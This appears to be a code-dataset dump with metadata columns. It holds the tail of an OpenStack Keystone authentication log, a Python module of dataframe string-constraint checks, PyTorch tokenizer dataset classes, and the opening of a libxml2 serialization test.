2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/core.py", line 433, in wrapper
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return f(self, *args, **kwargs)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/core.py", line 443, in wrapper
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return f(self, *args, **kwargs)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 1053, in decorate
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core should_cache_fn)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 657, in get_or_create
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core async_creator) as value:
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/core/dogpile.py", line 158, in __enter__
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return self._enter()
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/core/dogpile.py", line 98, in _enter
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core generated = self._enter_create(createdtime)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/core/dogpile.py", line 149, in _enter_create
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core created = self.creator()
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 625, in gen_value
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core created_value = creator()
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 1049, in creator
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return fn(*arg, **kw)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/core.py", line 902, in get_user_by_name
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core ref = driver.get_user_by_name(user_name, domain_id)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/backends/sql.py", line 253, in get_user_by_name
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core raise exception.UserNotFound(user_id=user_name)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core UserNotFound: Could not find user: root
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core
2017-07-30 17:20:29.089 3278 WARNING keystone.common.wsgi [req-98982a97-90ca-411f-843d-c4dd5186fe5a - - - - -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:35.852 3279 INFO keystone.common.wsgi [req-2b0ef7e5-a560-4bdd-9815-a7b554fbebb6 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:35.957 3279 INFO keystone.token.providers.fernet.utils [req-2b0ef7e5-a560-4bdd-9815-a7b554fbebb6 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:35.967 3280 INFO keystone.token.providers.fernet.utils [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.010 3280 INFO keystone.common.wsgi [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:36.016 3280 INFO keystone.token.providers.fernet.utils [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.097 3280 WARNING keystone.common.wsgi [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:36.108 3278 INFO keystone.common.wsgi [req-4964e49e-5345-4baa-b74a-84198dc9dfb0 - - - - -] GET http://controller:5000/v3/
2017-07-30 17:20:36.120 3277 INFO keystone.token.providers.fernet.utils [req-78b59c40-4bc8-4991-8fcb-f7b66c2513a7 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.171 3277 INFO keystone.common.wsgi [req-78b59c40-4bc8-4991-8fcb-f7b66c2513a7 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] GET http://controller:5000/v3/users/63dee1ed626b4040bcd43b3492997a8c/projects
2017-07-30 17:20:36.219 3278 INFO keystone.token.providers.fernet.utils [req-8487814f-ba80-4ecd-a691-f9d7185e11be - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.263 3278 INFO keystone.common.wsgi [req-8487814f-ba80-4ecd-a691-f9d7185e11be 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:36.277 3278 INFO keystone.token.providers.fernet.utils [req-8487814f-ba80-4ecd-a691-f9d7185e11be 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.388 3278 INFO keystone.token.providers.fernet.utils [req-8487814f-ba80-4ecd-a691-f9d7185e11be 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:37.038 3281 INFO keystone.token.providers.fernet.utils [req-409620fb-dd6b-493a-9b9f-259943f1564b - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:37.098 3281 INFO keystone.common.wsgi [req-409620fb-dd6b-493a-9b9f-259943f1564b 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] GET http://controller:5000/v3/users/63dee1ed626b4040bcd43b
| 157.62963
| 264
| 0.777491
| 1,398
| 8,512
| 4.690987
| 0.158798
| 0.049405
| 0.065874
| 0.082342
| 0.907594
| 0.89875
| 0.81351
| 0.801311
| 0.754498
| 0.706008
| 0
| 0.280758
| 0.089051
| 8,512
| 54
| 265
| 157.62963
| 0.564999
| 0
| 0
| 0.037037
| 0
| 0.037037
| 0.088688
| 0.088453
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
915e01b808959953019e75202c7852f412df2ba0
| 13,119
|
py
|
Python
|
sdk/python/dq_whistler/constraints/string_type.py
|
nareshbab/dq_whistler
|
dabc761b201e777efe3070222a9c6c40b8848cfb
|
[
"MIT"
] | null | null | null |
sdk/python/dq_whistler/constraints/string_type.py
|
nareshbab/dq_whistler
|
dabc761b201e777efe3070222a9c6c40b8848cfb
|
[
"MIT"
] | null | null | null |
sdk/python/dq_whistler/constraints/string_type.py
|
nareshbab/dq_whistler
|
dabc761b201e777efe3070222a9c6c40b8848cfb
|
[
"MIT"
] | 4
|
2021-10-04T07:10:06.000Z
|
2021-10-04T07:39:56.000Z
|
from dq_whistler.constraints.constraint import Constraint
from typing import Dict, Union
from pandas.core.series import Series as pandas_df
from pyspark.sql.dataframe import DataFrame as spark_df
import pyspark.sql.functions as f
class Equal(Constraint):
"""
Equal constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"eq",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``eq`` to ``"abc"``, then the dataframe will have rows where
values are ``!= "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name) != self._values
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame != self._values]
class NotEqual(Constraint):
"""
NotEqual constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"nt_eq",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``nt_eq`` to ``"abc"``, then the dataframe will have rows where
values are ``== "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name) == self._values
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame == self._values]
class Contains(Constraint):
"""
Contains constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"contains",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``contains`` ``"abc"``, then the dataframe will have rows where
values ``does not contains "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).contains(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.contains(self._values)]
class NotContains(Constraint):
"""
NotContains constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_contains",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_contains`` ``abc``, then the dataframe will have rows where
values ``contains "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).contains(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.str.contains(self._values)]
class StartsWith(Constraint):
"""
StartsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"starts_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``starts_with`` ``"abc"``, then the dataframe will have rows where
values ``does not starts with "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).startswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.startswith(self._values)]
class NotStartsWith(Constraint):
"""
NotStartsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_starts_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_starts_with`` ``"abc"``, then the dataframe will have rows where
values ``starts with "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).startswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.str.startswith(self._values)]
class EndsWith(Constraint):
"""
EndsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"ends_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``ends_with`` ``"abc"``, then the dataframe will have rows where
values ``does not ends with "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).endswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.endswith(self._values)]
class NotEndsWith(Constraint):
"""
NotEndsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_ends_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_ends_with`` ``"abc"``, then the dataframe will have rows where
values ``ends with "abc"`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).endswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.str.endswith(self._values)]
class IsIn(Constraint):
"""
IsIn constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"is_in",
"values": ["abc", "xyz"]
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``is_in`` ``["abc", "xyz"]``, then the dataframe will have rows where
values ``are not in ["abc", "xyz"]`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).isin(*self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.isin(self._values)]
class NotIn(Constraint):
"""
NotIn constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_in",
"values": ["abc", "xyz"]
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_in`` ``["abc", "xyz"]``, then the dataframe will have rows where
values ``are in ["abc", "xyz"]`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).isin(*self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.isin(self._values)]
class Regex(Constraint):
"""
Regex constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"regex",
"values": "^[A-Za-z]$"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``regex`` ``^[A-Za-z]$``, then the dataframe will have rows where
values ``does not`` satisfies the regex ``^[A-Za-z]$`` (i.e only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).rlike(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.match(pat=self._values)]
| 32.472772
| 120
| 0.696928
| 1,840
| 13,119
| 4.777174
| 0.050543
| 0.07884
| 0.041866
| 0.045051
| 0.93595
| 0.93595
| 0.93595
| 0.93595
| 0.93595
| 0.93595
| 0
| 0
| 0.16236
| 13,119
| 403
| 121
| 32.55335
| 0.799891
| 0.687781
| 0
| 0.573913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.191304
| false
| 0
| 0.043478
| 0
| 0.521739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9172c8d7400a97722290597316877f0b875f8b11
| 9,788
|
py
|
Python
|
trankit/iterators/tokenizer_iterators.py
|
jsteggink/trankit
|
61ef593999bfa29751990d0d4bcf259daed05db4
|
[
"Apache-2.0"
] | 613
|
2021-01-12T14:21:13.000Z
|
2022-03-29T19:51:47.000Z
|
trankit/iterators/tokenizer_iterators.py
|
jsteggink/trankit
|
61ef593999bfa29751990d0d4bcf259daed05db4
|
[
"Apache-2.0"
] | 38
|
2021-01-13T12:01:15.000Z
|
2022-03-31T14:13:44.000Z
|
trankit/iterators/tokenizer_iterators.py
|
jsteggink/trankit
|
61ef593999bfa29751990d0d4bcf259daed05db4
|
[
"Apache-2.0"
] | 77
|
2021-01-13T07:33:26.000Z
|
2022-03-29T19:51:50.000Z
|
from . import *
# for sents
instance_fields = [
'paragraph_index',
'wordpieces', 'wordpiece_labels', 'wordpiece_ends',
'piece_idxs', 'attention_masks', 'token_type_idxs',
'wordpiece_num'
]
batch_fields = [
'paragraph_index',
'wordpieces', 'wordpiece_labels', 'wordpiece_ends',
'piece_idxs', 'attention_masks', 'token_type_idxs',
'wordpiece_num'
]
Instance = namedtuple('Instance', field_names=instance_fields)
Batch = namedtuple('Batch', field_names=batch_fields)
class TokenizeDatasetLive(Dataset):
def __init__(self, config, raw_text, max_input_length=512):
self.config = config
self.max_input_length = max_input_length
self.treebank_name = config.treebank_name
self.raw_text = raw_text
self.data = []
self.load_data()
def __len__(self):
return len(self.data)
def __getitem__(self, item):
return self.data[item]
def load_data(self):
self.data = charlevel_format_to_wordpiece_format(
wordpiece_splitter=self.config.wordpiece_splitter,
max_input_length=self.max_input_length,
plaintext=self.raw_text,
treebank_name=self.config.treebank_name
)
def numberize(self, wordpiece_splitter): # wordpiece tokenizer
data = []
for inst in self.data:
wordpieces = inst['wordpieces']
wordpiece_labels = inst['wordpiece_labels']
wordpiece_ends = inst['wordpiece_ends']
paragraph_index = inst['paragraph_index']
# Pad word pieces with special tokens
piece_idxs = wordpiece_splitter.encode(
wordpieces,
add_special_tokens=True,
max_length=self.max_input_length,
truncation=True
)
assert len(piece_idxs) <= self.max_input_length
pad_num = self.max_input_length - len(piece_idxs)
attn_masks = [1] * len(piece_idxs) + [0] * pad_num
piece_idxs = piece_idxs + [0] * pad_num
# token type idxs
token_type_idxs = [-100 if piece_id >= len(wordpieces) else wordpiece_labels[piece_id] for piece_id in
range(len(piece_idxs) - 2)]
instance = Instance(
paragraph_index=paragraph_index,
wordpieces=wordpieces,
wordpiece_labels=wordpiece_labels,
wordpiece_ends=wordpiece_ends,
piece_idxs=piece_idxs,
attention_masks=attn_masks,
token_type_idxs=token_type_idxs,
wordpiece_num=len(wordpieces)
)
data.append(instance)
self.data = data
def collate_fn(self, batch):
batch_paragraph_index = []
batch_wordpieces = []
batch_wordpiece_labels = []
batch_wordpiece_ends = []
batch_piece_idxs = []
batch_attention_masks = []
batch_token_type_idxs = []
batch_wordpiece_num = []
for inst in batch:
batch_paragraph_index.append(inst.paragraph_index)
batch_wordpieces.append(inst.wordpieces)
batch_wordpiece_labels.append(inst.wordpiece_labels)
batch_wordpiece_ends.append(inst.wordpiece_ends)
batch_piece_idxs.append(inst.piece_idxs)
batch_attention_masks.append(inst.attention_masks)
batch_token_type_idxs.append(inst.token_type_idxs)
batch_wordpiece_num.append(inst.wordpiece_num)
batch_piece_idxs = torch.tensor(batch_piece_idxs, dtype=torch.long, device=self.config.device)
batch_attention_masks = torch.tensor(batch_attention_masks, dtype=torch.long, device=self.config.device)
batch_token_type_idxs = torch.tensor(batch_token_type_idxs, dtype=torch.long, device=self.config.device)
batch_wordpiece_num = torch.tensor(batch_wordpiece_num, dtype=torch.long, device=self.config.device)
return Batch(
paragraph_index=batch_paragraph_index,
wordpieces=batch_wordpieces,
wordpiece_labels=batch_wordpiece_labels,
wordpiece_ends=batch_wordpiece_ends,
piece_idxs=batch_piece_idxs,
attention_masks=batch_attention_masks,
token_type_idxs=batch_token_type_idxs,
wordpiece_num=batch_wordpiece_num
)
class TokenizeDataset(Dataset):
def __init__(self, config, txt_fpath, conllu_fpath, evaluate=False):
self.config = config
self.evaluate = evaluate
self.plaintext_file = txt_fpath
self.conllu_file = conllu_fpath
self.treebank_name = config.treebank_name
self.char_labels_output_fpath = os.path.join(self.config._save_dir, os.path.basename(txt_fpath) + '.character')
self.data = []
self.load_data()
def __len__(self):
return len(self.data)
def __getitem__(self, item):
return self.data[item]
def load_data(self):
if not self.evaluate:
conllu_to_charlevel_format(
plaintext_file=self.plaintext_file,
conllu_file=self.conllu_file,
char_labels_output_fpath=self.char_labels_output_fpath
)
with open(self.plaintext_file, 'r') as f:
plaintext = ''.join(f.readlines())
self.data = charlevel_format_to_wordpiece_format(
wordpiece_splitter=self.config.wordpiece_splitter,
max_input_length=self.config.max_input_length,
plaintext=plaintext,
treebank_name=self.treebank_name,
char_labels_output_fpath=self.char_labels_output_fpath
)
else:
with open(self.plaintext_file, 'r') as f:
plaintext = ''.join(f.readlines())
self.data = charlevel_format_to_wordpiece_format(
wordpiece_splitter=self.config.wordpiece_splitter,
max_input_length=self.config.max_input_length,
plaintext=plaintext,
treebank_name=self.treebank_name,
char_labels_output_fpath=None
)
print('Loaded {} examples from: \n(i) {}\n(ii) {}'.format(len(self), self.plaintext_file, self.conllu_file))
print('-' * 50)
def numberize(self): # tokenizer: wordpiece tokenizer
data = []
for inst in self.data:
wordpieces = inst['wordpieces']
wordpiece_labels = inst['wordpiece_labels']
wordpiece_ends = inst['wordpiece_ends']
paragraph_index = inst['paragraph_index']
# Pad word pieces with special tokens
piece_idxs = self.config.wordpiece_splitter.encode(
wordpieces,
add_special_tokens=True,
max_length=self.config.max_input_length,
truncation=True
)
assert len(piece_idxs) <= self.config.max_input_length
pad_num = self.config.max_input_length - len(piece_idxs)
attn_masks = [1] * len(piece_idxs) + [0] * pad_num
piece_idxs = piece_idxs + [0] * pad_num
# token type idxs
token_type_idxs = [-100 if piece_id >= len(wordpieces) else wordpiece_labels[piece_id] for piece_id in
range(len(piece_idxs) - 2)]
instance = Instance(
paragraph_index=paragraph_index,
wordpieces=wordpieces,
wordpiece_labels=wordpiece_labels,
wordpiece_ends=wordpiece_ends,
piece_idxs=piece_idxs,
attention_masks=attn_masks,
token_type_idxs=token_type_idxs,
wordpiece_num=len(wordpieces)
)
data.append(instance)
self.data = data
def collate_fn(self, batch):
batch_paragraph_index = []
batch_wordpieces = []
batch_wordpiece_labels = []
batch_wordpiece_ends = []
batch_piece_idxs = []
batch_attention_masks = []
batch_token_type_idxs = []
batch_wordpiece_num = []
for inst in batch:
batch_paragraph_index.append(inst.paragraph_index)
batch_wordpieces.append(inst.wordpieces)
batch_wordpiece_labels.append(inst.wordpiece_labels)
batch_wordpiece_ends.append(inst.wordpiece_ends)
batch_piece_idxs.append(inst.piece_idxs)
batch_attention_masks.append(inst.attention_masks)
batch_token_type_idxs.append(inst.token_type_idxs)
batch_wordpiece_num.append(inst.wordpiece_num)
batch_piece_idxs = torch.tensor(batch_piece_idxs, dtype=torch.long, device=self.config.device)
batch_attention_masks = torch.tensor(batch_attention_masks, dtype=torch.long, device=self.config.device)
batch_token_type_idxs = torch.tensor(batch_token_type_idxs, dtype=torch.long, device=self.config.device)
batch_wordpiece_num = torch.tensor(batch_wordpiece_num, dtype=torch.long, device=self.config.device)
return Batch(
paragraph_index=batch_paragraph_index,
wordpieces=batch_wordpieces,
wordpiece_labels=batch_wordpiece_labels,
wordpiece_ends=batch_wordpiece_ends,
piece_idxs=batch_piece_idxs,
attention_masks=batch_attention_masks,
token_type_idxs=batch_token_type_idxs,
wordpiece_num=batch_wordpiece_num
)
| 38.996016
| 120
| 0.617695
| 1,058
| 9,788
| 5.335539
| 0.104915
| 0.054207
| 0.05527
| 0.031887
| 0.871391
| 0.854562
| 0.84411
| 0.830647
| 0.830647
| 0.818069
| 0
| 0.002788
| 0.303739
| 9,788
| 250
| 121
| 39.152
| 0.825532
| 0.016755
| 0
| 0.762376
| 0
| 0
| 0.042067
| 0
| 0
| 0
| 0
| 0
| 0.009901
| 1
| 0.059406
| false
| 0
| 0.004951
| 0.019802
| 0.10396
| 0.009901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91753e7ffeb9c0adb1dc756ee840345dd8bf1683
| 4,259
|
py
|
Python
|
python/tests/serialize.py
|
balabit-deps/libxml2
|
e0c76087bdd489ebed32158d2debb7d3a2fbfcb2
|
[
"MIT"
] | 4
|
2017-05-04T15:50:48.000Z
|
2020-07-30T03:52:07.000Z
|
python/tests/serialize.py
|
balabit-deps/libxml2
|
e0c76087bdd489ebed32158d2debb7d3a2fbfcb2
|
[
"MIT"
] | 5
|
2018-07-18T19:07:02.000Z
|
2018-07-30T17:08:11.000Z
|
python/tests/serialize.py
|
balabit-deps/libxml2
|
e0c76087bdd489ebed32158d2debb7d3a2fbfcb2
|
[
"MIT"
] | 17
|
2015-03-18T02:02:54.000Z
|
2021-06-14T16:13:56.000Z
|
#!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific
libxml2.debugMemory(1)
#
# Testing XML document serialization
#
doc = libxml2.parseDoc("""<root><foo>hello</foo></root>""")
str = doc.serialize()
if str != """<?xml version="1.0"?>
<root><foo>hello</foo></root>
""":
print "error serializing XML document 1"
sys.exit(1)
str = doc.serialize("iso-8859-1")
if str != """<?xml version="1.0" encoding="iso-8859-1"?>
<root><foo>hello</foo></root>
""":
print "error serializing XML document 2"
sys.exit(1)
str = doc.serialize(format=1)
if str != """<?xml version="1.0"?>
<root>
<foo>hello</foo>
</root>
""":
print "error serializing XML document 3"
sys.exit(1)
str = doc.serialize("iso-8859-1", 1)
